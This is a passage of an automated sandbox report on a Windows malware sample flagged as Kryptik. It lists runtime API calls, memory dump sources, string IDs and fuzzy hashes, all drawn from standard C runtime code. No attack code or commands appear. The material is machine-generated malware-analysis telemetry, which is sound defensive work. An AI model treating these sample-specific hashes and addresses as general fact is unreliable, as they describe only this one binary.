                                                              • Opcode Fuzzy Hash: 4828b68452414b976fce63ca4c703ddfeade55bfdfb8d09f6675fe12ed361c88
                                                              • Instruction Fuzzy Hash: 5151B272500216AFDB219F66CC81EFF3AA9EF44754F25012AFD04A7240EB39DD9186E8
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00403DA3
                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00403DEF
                                                              • __Getctype.LIBCPMT ref: 00403E08
                                                              • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00403E24
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00403EB9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                              • String ID: bad locale name
                                                              • API String ID: 1840309910-1405518554
                                                              • Opcode ID: 66323f1d793a72052a811f518f6dd944a9322236d7f2dab7bac132f41dc380e4
                                                              • Instruction ID: 735bfd9e15749c96a7d30fe23bfbaee7cab1fe25536061823035921e9fb647b7
                                                              • Opcode Fuzzy Hash: 66323f1d793a72052a811f518f6dd944a9322236d7f2dab7bac132f41dc380e4
                                                              • Instruction Fuzzy Hash: E25180B1D003489BDF10DFA5D8457CEBBB8AF14315F14426AEC15BB381E779AA08C799
                                                              APIs
                                                              • __RTC_Initialize.LIBCMT ref: 1000291D
                                                              • ___scrt_uninitialize_crt.LIBCMT ref: 10002937
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Initialize___scrt_uninitialize_crt
                                                              • String ID:
                                                              • API String ID: 2442719207-0
                                                              • Opcode ID: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                              • Instruction ID: 04769ff959a67eddfc0a91c70c155494b73e6b711ec1a15a155288148215b0b0
                                                              • Opcode Fuzzy Hash: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                              • Instruction Fuzzy Hash: 3741F372E05229AFFB21CF68CC41BAF7BA4EB846D0F114119F84467258DB309E419BA1
                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 0040FB57
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0040FB5F
                                                              • _ValidateLocalCookies.LIBCMT ref: 0040FBE8
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 0040FC13
                                                              • _ValidateLocalCookies.LIBCMT ref: 0040FC68
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 1170836740-1018135373
                                                              • Opcode ID: 273efe6150e4a2726b12b48060be4535457cf5dcd07bd1ee1b29e53da4973c9f
                                                              • Instruction ID: feac5375391b8ac6f8c542b9474111b56147410f227dd59f06f236b9ab0aef11
                                                              • Opcode Fuzzy Hash: 273efe6150e4a2726b12b48060be4535457cf5dcd07bd1ee1b29e53da4973c9f
                                                              • Instruction Fuzzy Hash: DB41B834A002089BCF20DF69C891A9E7BB4BF44358F14807BE8156B7D2D779EA59CF94
                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 10003A57
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 10003A5F
                                                              • _ValidateLocalCookies.LIBCMT ref: 10003AE8
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 10003B13
                                                              • _ValidateLocalCookies.LIBCMT ref: 10003B68
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 1170836740-1018135373
                                                              • Opcode ID: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                              • Instruction ID: 53213870faae5245fec6ed73a44d54790f208d332314260de239e107b7581961
                                                              • Opcode Fuzzy Hash: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                              • Instruction Fuzzy Hash: 2A41E434A002189FDF02CF68C881A9FBBF9EF453A8F11C065E9149B356C771EA15CB91
                                                              Strings
                                                              • VA, xrefs: 0041E854
                                                              • C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, xrefs: 0041E808
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe$VA
                                                              • API String ID: 0-3003594799
                                                              • Opcode ID: bbc246354933274b12cc74a321791b42bb805874b1c62c20345f16d1b2f24b5d
                                                              • Instruction ID: 2b41407daedabdefeb68af409a406bd3dd60cc27b104900d0df700e292202cc0
                                                              • Opcode Fuzzy Hash: bbc246354933274b12cc74a321791b42bb805874b1c62c20345f16d1b2f24b5d
                                                              • Instruction Fuzzy Hash: A421B075604105AF9B20BF638C419EB77ADEF013A8710852BFD2587251E739EC819768
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 0-537541572
                                                              • Opcode ID: ab3301201762d8709fda81139749348a43ff2ca55212c488a12608a7673bf9c9
                                                              • Instruction ID: a0b7181f714cca58eaa4ddaccdd8282d036359da2c95a804dd2d27402f6bcf77
                                                              • Opcode Fuzzy Hash: ab3301201762d8709fda81139749348a43ff2ca55212c488a12608a7673bf9c9
                                                              • Instruction Fuzzy Hash: 2A212BB1A21224ABCB314B259C51BEF77689F417A0F21012EED46A7390DB38ED41C5ED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 0-537541572
                                                              • Opcode ID: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                              • Instruction ID: 4a8ea71034e84b8525c0961ad639e20c08c2bf99947945f029ec6b94e21b7784
                                                              • Opcode Fuzzy Hash: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                              • Instruction Fuzzy Hash: DC219671E01321EBF722DB648C81A4E37A4FB456E0B214124ED59A7195D778EE00A6E1
                                                              APIs
                                                                • Part of subcall function 021900B8: _free.LIBCMT ref: 021900DD
                                                              • _free.LIBCMT ref: 021903BA
                                                                • Part of subcall function 0218994F: HeapFree.KERNEL32(00000000,00000000,?,021900E2,?,00000000,?,?,?,02190385,?,00000007,?,?,02190878,?), ref: 02189965
                                                                • Part of subcall function 0218994F: GetLastError.KERNEL32(?,?,021900E2,?,00000000,?,?,?,02190385,?,00000007,?,?,02190878,?,?), ref: 02189977
                                                              • _free.LIBCMT ref: 021903C5
                                                              • _free.LIBCMT ref: 021903D0
                                                              • _free.LIBCMT ref: 02190424
                                                              • _free.LIBCMT ref: 0219042F
                                                              • _free.LIBCMT ref: 0219043A
                                                              • _free.LIBCMT ref: 02190445
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 800aa5c3ccae66d18581fa224c31917642b9d86138236abd6320ecb2878ee498
                                                              • Instruction ID: 7d3484cd0c2d2d7154f1c105587bb0d7a3395ea5b27bb6173b1d91c44a58151b
                                                              • Opcode Fuzzy Hash: 800aa5c3ccae66d18581fa224c31917642b9d86138236abd6320ecb2878ee498
                                                              • Instruction Fuzzy Hash: 7D114C729C0F04EEDE61BFB0CC86FDB779EAF08740F444C15A299A6160DB65B5098F52
                                                              APIs
                                                                • Part of subcall function 0041FE51: _free.LIBCMT ref: 0041FE76
                                                              • _free.LIBCMT ref: 00420153
                                                                • Part of subcall function 004196E8: RtlFreeHeap.NTDLL(00000000,00000000,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?), ref: 004196FE
                                                                • Part of subcall function 004196E8: GetLastError.KERNEL32(?,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?,?), ref: 00419710
                                                              • _free.LIBCMT ref: 0042015E
                                                              • _free.LIBCMT ref: 00420169
                                                              • _free.LIBCMT ref: 004201BD
                                                              • _free.LIBCMT ref: 004201C8
                                                              • _free.LIBCMT ref: 004201D3
                                                              • _free.LIBCMT ref: 004201DE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: cdd5e4471268dfd21d5239b5f7fa74d2fa29ef36221d2afbd4b55f52868d9946
                                                              • Instruction ID: 19dd4c8c7b65d2d86164fed46a4597e2e19d2a81908c0efd60b677630b23bdd7
                                                              • Opcode Fuzzy Hash: cdd5e4471268dfd21d5239b5f7fa74d2fa29ef36221d2afbd4b55f52868d9946
                                                              • Instruction Fuzzy Hash: 75112E71681704AADA20B7B2CC56FCB779C9F00B04F40082BF29966073DA7DF9898659
                                                              APIs
                                                              • GetConsoleOutputCP.KERNEL32(00000000,00000000,?), ref: 02192516
                                                              • __fassign.LIBCMT ref: 021926FB
                                                              • __fassign.LIBCMT ref: 02192718
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02192760
                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 021927A0
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 02192848
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                              • String ID:
                                                              • API String ID: 1735259414-0
                                                              APIs
                                                              • GetConsoleOutputCP.KERNEL32(00000000,00000000,?), ref: 004222AF
                                                              • __fassign.LIBCMT ref: 00422494
                                                              • __fassign.LIBCMT ref: 004224B1
                                                              • WriteFile.KERNEL32(?,004244B3,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004224F9
                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00422539
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004225E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                              • String ID:
                                                              • API String ID: 1735259414-0
                                                              APIs
                                                              • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000B720
                                                              • __fassign.LIBCMT ref: 1000B905
                                                              • __fassign.LIBCMT ref: 1000B922
                                                              • WriteFile.KERNEL32(?,10009A1A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000B96A
                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000B9AA
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000BA52
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                               • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                              • String ID:
                                                              • API String ID: 1735259414-0
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0217CE49
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0217CEB4
                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0217CED1
                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0217CF10
                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0217CF6F
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0217CF92
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiStringWide
                                                              • String ID:
                                                              • API String ID: 2829165498-0
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0217AE7D
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0217AEA0
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0217AEC0
                                                              • std::_Facet_Register.LIBCPMT ref: 0217AF22
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0217AF3A
                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 0217AF5D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                              • String ID:
                                                              • API String ID: 2081738530-0
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040AC16
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040AC39
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040AC59
                                                              • std::_Facet_Register.LIBCPMT ref: 0040ACBB
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040ACD3
                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 0040ACF6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                              • String ID:
                                                              • API String ID: 2081738530-0
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,0217FF42,0217E5C6,0217DC00), ref: 0217FF59
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0217FF67
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0217FF80
                                                              • SetLastError.KERNEL32(00000000,0217FF42,0217E5C6,0217DC00), ref: 0217FFD2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,0040FCDB,0040E35F,0040D999), ref: 0040FCF2
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040FD00
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040FD19
                                                              • SetLastError.KERNEL32(00000000,0040FCDB,0040E35F,0040D999), ref: 0040FD6B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              APIs
                                                              • GetLastError.KERNEL32(00000001,?,10003C01,10002DB0,100027A7,?,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8), ref: 10003E08
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003E16
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003E2F
                                                              • SetLastError.KERNEL32(00000000,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8,?,00000001,?), ref: 10003E81
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                               • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              Strings
                                                              • C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, xrefs: 0218EA6F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                              • API String ID: 0-3288490397
                                                              APIs
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00410E48,?,?,00438470,00000000,?,00410F73,00000004,InitializeCriticalSectionEx,00429B9C,InitializeCriticalSectionEx,00000000), ref: 00410E17
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID: api-ms-
                                                              • API String ID: 3664257935-2084034818
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00414CC6,?,?,00414C8E,00000000,74DEDF80,?), ref: 00414CE6
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00414CF9
                                                              • FreeLibrary.KERNEL32(00000000,?,?,00414CC6,?,?,00414C8E,00000000,74DEDF80,?), ref: 00414D1C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FBF
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10005FD2
                                                              • FreeLibrary.KERNEL32(00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FF5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                               • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              APIs
                                                                • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,74DEDF80,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418E28
                                                                • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418EC6
                                                              • _free.LIBCMT ref: 004184A7
                                                              • _free.LIBCMT ref: 004184C0
                                                              • _free.LIBCMT ref: 004184FE
                                                              • _free.LIBCMT ref: 00418507
                                                              • _free.LIBCMT ref: 00418513
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Similarity
                                                              • API ID: _free$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3291180501-0
                                                              APIs
                                                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,1000A899,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 1000A680
                                                              • __alloca_probe_16.LIBCMT ref: 1000A736
                                                              • __alloca_probe_16.LIBCMT ref: 1000A7CC
                                                              • __freea.LIBCMT ref: 1000A837
                                                              • __freea.LIBCMT ref: 1000A843
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: __alloca_probe_16__freea$Info
                                                              • String ID:
                                                              • API String ID: 2330168043-0
                                                              • Opcode ID: 6801c7cf1a2c1c6b356f2cb05e88654cbb9424f85dc0dbbe55d1f090f9a52ad6
                                                              • Instruction ID: 1dd90d70d9504398cfa9d6ef4ea6864651e072268de8b4bf5549d7cf43e308ef
                                                              • Opcode Fuzzy Hash: 6801c7cf1a2c1c6b356f2cb05e88654cbb9424f85dc0dbbe55d1f090f9a52ad6
                                                              • Instruction Fuzzy Hash: C081A472D042569BFF11CE648C81ADE7BF5EF0B6D0F158265E904AB148DB369DC1CBA0
                                                              APIs
                                                              • __alloca_probe_16.LIBCMT ref: 1000B03B
                                                              • __alloca_probe_16.LIBCMT ref: 1000B101
                                                              • __freea.LIBCMT ref: 1000B16D
                                                                • Part of subcall function 100079EE: RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                              • __freea.LIBCMT ref: 1000B176
                                                              • __freea.LIBCMT ref: 1000B199
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1423051803-0
                                                              • Opcode ID: 08a43eba5b954a3f04cd68b018e4776cfa43d2eee8ce0c2eced5adaaebccb1f4
                                                              • Instruction ID: ca0e6193c5ab93552cef367aef9b2c098b98f9a761b18089088d519bce5e91c7
                                                              • Opcode Fuzzy Hash: 08a43eba5b954a3f04cd68b018e4776cfa43d2eee8ce0c2eced5adaaebccb1f4
                                                              • Instruction Fuzzy Hash: 6651C072600616ABFB21CF64CC81EAF37E9EF456D0F624129FD14A7158EB34EC5197A0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 3033488037-0
                                                              • Opcode ID: bf325a0276ac7524d4f60471fb5fe8747a97fbc829fc97ca04c34618ab33ca25
                                                              • Instruction ID: 6e5c2fc36d4b4d4dc7154406c260d4dc9f26869045b60dbbe7e1a2f28969980c
                                                              • Opcode Fuzzy Hash: bf325a0276ac7524d4f60471fb5fe8747a97fbc829fc97ca04c34618ab33ca25
                                                              • Instruction Fuzzy Hash: 7E51C672A40309AFDB21EF29CCC1B6AB7F5EF44724B550669E805DB290E735E941CF80
                                                              APIs
                                                                • Part of subcall function 0041A395: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040E15B,?,?,?,004010DD,?,00403497,?,?,?), ref: 0041A3C7
                                                              • _free.LIBCMT ref: 00417E40
                                                              • _free.LIBCMT ref: 00417E57
                                                              • _free.LIBCMT ref: 00417E74
                                                              • _free.LIBCMT ref: 00417E8F
                                                              • _free.LIBCMT ref: 00417EA6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
